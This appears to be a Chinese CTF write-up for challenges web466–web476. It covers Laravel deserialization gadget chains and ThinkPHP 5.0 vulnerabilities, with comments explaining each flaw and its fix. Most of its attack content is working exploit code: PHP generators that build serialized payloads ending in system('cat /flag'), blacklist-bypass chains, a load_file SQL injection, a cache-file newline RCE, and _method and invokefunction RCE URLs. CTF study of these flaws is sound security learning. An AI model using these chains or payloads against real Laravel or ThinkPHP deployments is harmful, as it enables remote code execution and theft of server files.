web466
Laravel5.4反序列化
Laravel相关知识:
添加路由在/routes/web.php
添加控制器在/app/Http/Controllers/
题目在路由处添加了反序列化入口
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
// Default landing route; not part of the challenge.
Route::get('/', function () {
return view('welcome');
});
// Deserialization entry point of the challenge. The {obj} route segment
// arrives in the closure as $s (Laravel presumably binds route parameters
// by position, not by name — confirm for 5.4).
//
// Security note: $s is fully attacker-controlled, and unserialize() on
// attacker-controlled bytes instantiates any autoloadable class in the
// application or its vendor tree, so this is an object-injection sink.
// The fix is not to deserialize request data at all (e.g. json_decode());
// at minimum call unserialize($data, ['allowed_classes' => false]) so that
// no object — and therefore no magic method — is ever created.
Route::get('admin/{obj}',function($s){
if($s){
// Return value is discarded: a gadget chain runs from magic methods
// (__wakeup/__destruct and friends) during or after unserialize(),
// not from anything this closure does with the result.
unserialize(base64_decode($s));
// Echoes the raw payload back; if served as HTML this is also a
// reflected-XSS sink — presumably text/html by default, verify.
return 'unserialize done'.$s;
}else{
// Falsy segment (empty string or '0'): nothing is deserialized.
return 'unserialize error'.$s;
}
});
利用已知的反序列化链
<?php
// Gadget-chain generator for web466. Nothing here is executed locally: these
// are stand-in classes whose namespaces, names and property visibility mirror
// the real Laravel/Mockery classes, so that serialize() produces a string the
// target's unserialize() maps onto the real classes. Only the class name and
// the property names/visibility matter for the serialized form (protected
// properties carry a "\0*\0" prefix), which is why every stub must match the
// framework exactly.
namespace Mockery\Generator {
// Mirrors Mockery\Generator\MockConfiguration; the name value is arbitrary.
class MockConfiguration {
protected $name = 'fallingskies';
}
// Mirrors Mockery\Generator\MockDefinition. $code holds PHP source that the
// real loader is expected to evaluate — from a defender's view, any code path
// that eval()s a string read from an object property is a gadget.
class MockDefinition {
protected $config;
protected $code;
public function __construct() {
$this->config = new MockConfiguration();
$this->code = "<?php system('cat /flag');?>";
}
}
}
namespace Mockery\Loader {
// Empty stub: only the class name needs to round-trip. The real class's
// load() method is what the chain ends up calling (presumably via eval —
// verify against the installed Mockery version).
class EvalLoader {}
}
namespace Illuminate\Bus {
use Mockery\Loader\EvalLoader;
// Mirrors Illuminate\Bus\Dispatcher. An [object, 'method'] pair is stored in a
// property the real framework later treats as a callable.
class Dispatcher {
protected $queueResolver;
public function __construct() {
$this->queueResolver = [new EvalLoader(), 'load'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Bus\Dispatcher;
use Mockery\Generator\MockDefinition;
// Mirrors Illuminate\Broadcasting\BroadcastEvent; $connection is the object
// that eventually reaches the Bus dispatcher.
class BroadcastEvent {
public $connection;
public function __construct() {
$this->connection = new MockDefinition();
}
}
// Outermost object of the chain. Its magic method (presumably __destruct —
// confirm against Laravel 5.4) runs once the target's unserialize() returns,
// with $events and $event already populated from attacker data.
class PendingBroadcast {
protected $events;
protected $event;
public function __construct() {
$this->events = new Dispatcher();
$this->event = new BroadcastEvent();
}
}
// base64 is needed because the serialized form contains NUL bytes (protected
// property prefix); base64 output may itself contain '/', hence the double
// URL-encoding the notes below mention.
echo base64_encode(serialize(new PendingBroadcast()));
}
?>
如果生成的 payload 含有 /,需要进行 URL 编码,这里需要进行两次编码(%252f)。
web467
Laravel5.5反序列化
上题链被拦截,过滤了一堆关键字。
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
// Same sink as web466, now behind a keyword blacklist. The regex runs
// case-insensitively against the decoded payload and rejects class/property
// names used by previously published gadget chains. Blacklisting gadget names
// is not a fix: any other vendor class with a usable magic method yields a
// chain the list does not mention (the next code block on this page is one).
// The fix is to stop calling unserialize() on request data, or to pass
// ['allowed_classes' => false] so no object is instantiated at all.
Route::get('admin/{obj}',function($s){
if(preg_match('/defaultChannel|Validation|Bus|messages|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
换一条链就行了
<?php
// Gadget-chain generator for web467. Compared with web466 the dispatcher
// class is swapped for one whose name and properties are not on the
// challenge's blacklist; the outermost object is unchanged.
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
// Outermost object; presumably its destructor hands $this->event to
// $this->events (confirm against Laravel 5.5).
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
// NOTE: Dispatcher is declared in the namespace block below this one. This
// only works because PHP hoists unconditional top-level class declarations
// that extend/implement nothing — presumably the case here; if it ever fails
// with "class not found", move the Illuminate\Events block above this one.
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
namespace Illuminate\Events
{
// Mirrors Illuminate\Events\Dispatcher. $listeners maps an event name to the
// callables the real dispatcher invokes for it; here the event string is also
// what the callable presumably receives as its argument (verify).
class Dispatcher
{
protected $listeners;
public function __construct($event){
$this->listeners=[$event=>['system']];
}
}
}
web468
更改了过滤内容
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
// Same sink as web466/web467 with an edited blacklist: `listeners` is now
// rejected (blocking the web467 chain) but `defaultChannel` was dropped,
// which is exactly the weakness of name-based blacklists — every edit to the
// list re-opens whatever it stopped mentioning. See the web467 note for the
// actual fix (no unserialize() on request data / allowed_classes => false).
Route::get('admin/{obj}',function($s){
if(preg_match('/listeners|Validation|Bus|messages|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
使用其他链
<?php
// Gadget-chain generator for web468. Uses a notification channel manager as
// the object behind PendingBroadcast::$events; none of its property names
// appear in this challenge's blacklist.
namespace Illuminate\Notifications {
// Mirrors Illuminate\Notifications\ChannelManager. $customCreators maps a
// driver name to a creator callable and $app is presumably what that callable
// is invoked with when the driver named by $defaultChannel is resolved
// (verify against the framework's Manager implementation).
class ChannelManager {
protected $app;
protected $customCreators;
protected $defaultChannel;
public function __construct() {
$this->app = 'cat /flag';
$this->defaultChannel = 'fallingskies';
$this->customCreators = ['fallingskies' => 'system'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Notifications\ChannelManager;
// Outermost object, as in web466; $event is left unset here.
class PendingBroadcast {
protected $events;
public function __construct()
{
$this->events = new ChannelManager();
}
}
echo base64_encode(serialize(new PendingBroadcast()));
}
?>
web469
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
// Same sink, blacklist edited again: `defaultChannel` and `listeners` are
// both rejected now (blocking web467 and web468), while `Validation` was
// dropped. The underlying defect is unchanged — unserialize() on request
// data; see the web467 note for the fix.
Route::get('admin/{obj}',function($s){
if(preg_match('/defaultChannel|listeners|Bus|messages|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
<?php
// Gadget-chain generator for web469 (reused for web470–web472 per the notes
// below). The chain leaves the Illuminate namespace entirely and relies on the
// Faker dev dependency, illustrating why a blacklist of framework names cannot
// cover the whole vendor tree.
namespace Illuminate\Broadcasting
{
use Faker\ValidGenerator;
// Outermost object, as in web466; $event is left unset here.
class PendingBroadcast
{
protected $events;
public function __construct($cmd)
{
$this->events = new ValidGenerator($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
echo base64_encode(serialize($seri));
}
namespace Faker
{
use Faker\DefaultGenerator;
// Mirrors Faker\ValidGenerator. Presumably its __call forwards any method to
// $generator and then applies $validator to the result, retrying up to
// $maxRetries times until the validator returns truthy (verify against the
// installed Faker version). The large retry count is what keeps that loop
// from giving up before the validator callable runs.
class ValidGenerator
{
protected $maxRetries;
protected $validator;
protected $generator;
public function __construct($cmd)
{
$this->generator = new DefaultGenerator($cmd);
$this->maxRetries = 10000000;
$this->validator = 'system';
}
}
}
namespace Faker
{
// Mirrors Faker\DefaultGenerator; presumably returns $default for any method
// called on it, so $default becomes the value handed to the validator.
class DefaultGenerator
{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
}
?>
web470
<?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
// Same sink; this blacklist drops `Bus` and `messages`. The web469 chain uses
// none of the listed names, so it still passes — the notes below reuse it.
// Name-based filtering of serialized data is not a mitigation; see web467.
Route::get('admin/{obj}',function($s){
if(preg_match('/defaultChannel|Validation|listeners|CallQueuedClosure/i', base64_decode($s))){
die('other way');
}
if($s){
unserialize(base64_decode($s));
return 'unserialize done'.$s;
}else{
return 'unserialize error'.$s;
}
});
使用上题链
web471
laravel5.8 反序列化
使用上题链依然可以。
web472
laravel 8.1 反序列化
使用上题链依然可以。
web473
参考文章Thinkphp 5.0.15 设计缺陷导致Insert/update-SQL注入 分析
详细分析文章thinkphp5.0 SQL注入详细分析
thinkphp5.0.15默认控制器的部分代码,使用默认路由:
<?php
// Vulnerable controller action (ThinkPHP 5.0.15). 'a/a' is ThinkPHP's input
// syntax for "parameter a, cast to array" (assumes the `/a` type suffix —
// confirm), so $a reaches the query builder as an array instead of a scalar.
// ThinkPHP 5.0's data parser gives array column values a special meaning
// (the ['inc'|'exp', ...] forms shown in the payload below become SQL
// fragments rather than bound parameters), which is the injection.
// Mitigation: read the value as a scalar (e.g. the `/s` cast) and validate it
// before it is used as a column value; never let request arrays reach
// insert()/update() data untouched, and keep the framework patched.
public function inject(){
$a=request()->get('a/a');
db('users')->insert(['username'=>$a]);
return 'done';
}
payload
/?s=index/index/inject&a[0]=inc&a[1]=exp(~(select%20load_file(%27/flag%27)))&a[2]=
这里使用updatexml不行,所以用的exp报错注入。
web474
thinkphp5.0.5默认控制器的部分代码,使用默认路由:
<?php
// Vulnerable controller action (ThinkPHP 5.0.5). The raw GET value is stored
// in the file cache under a fixed key; per the notes below, the cache driver
// writes entries as PHP files at a path derived from md5 of the key, with the
// value placed after a `//` line-comment guard. A value containing a newline
// escapes that comment, so the attacker-supplied text is executed when the
// cache file is later loaded.
// Mitigation (as in the upstream fix): begin the generated file with an
// exit guard rather than a line comment, and do not cache unvalidated
// request input under predictable keys.
public function rce(){
Cache::set("cache",input('get.cache'));
return 'done';
}
参考文章Thinkphp cache缓存函数远程代码执行漏洞
缓存生成的路径和文件名是根据参数名的 md5 值计算的,这里参数名是 cache。
?s=index/index/rce&cache=%0d%0asystem(%27cat%20/flag%27);//
缓存路径: runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php

参考修复内容:原本使用 // 注释来防止缓存文件内容被解析执行,但可以使用换行符绕过;修复时在缓存文件开头使用 exit 来禁止解析缓存内容。
web475
参考文章thinkphp5 method任意调用方法导致rce
使用POST形式传参
_method=__construct&method=GET&filter[]=system&get[]=cat /flag
web476
参考之前的文章Thinkphp5未开启强制路由RCE
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
参考文章
https://www.anquanke.com/post/id/258264